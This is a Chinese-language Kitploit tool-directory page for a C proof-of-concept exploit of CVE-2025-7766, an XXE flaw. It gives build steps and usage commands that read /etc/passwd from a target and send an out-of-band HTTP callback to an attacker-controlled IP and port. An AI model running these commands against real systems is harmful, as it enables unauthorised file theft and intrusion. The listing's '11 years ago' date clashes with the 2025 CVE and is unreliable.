Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-7766 — 基于C语言的CVE-2025-7766 PoC漏洞利用,演示通过文件读取和带外HTTP回调实现XXE到RCE。支持自定义XML负载和重复请求。 | Kitploit
工具/GitHubGitHub/bytereaper77/cve-2025-7766
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发Archived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

基于C语言的CVE-2025-7766 PoC漏洞利用,演示通过文件读取和带外HTTP回调实现XXE到RCE。支持自定义XML负载和重复请求。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-7766 PoC Exploit

用于利用CVE-2025-7766中XML外部实体漏洞的PoC。演示文件读取(/etc/passwd)和带外HTTP回调。

作者: Byte Reaper

CVE: CVE-2025-7766

漏洞类型: 通过XML外部实体(XXE)实现远程代码执行


利用CVE-2025-7766中XXE的PoC。演示:

  • 从目标读取/etc/passwd。
  • 向你的服务器触发带外HTTP请求。

依赖

  • gcc
  • libcurl
  • argparse library

构建

root@kitploit:~
gcc -o exploit exploit.c argparse.c -lcurl

用法

root@kitploit:~
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v

许可证:

MIT

下载工具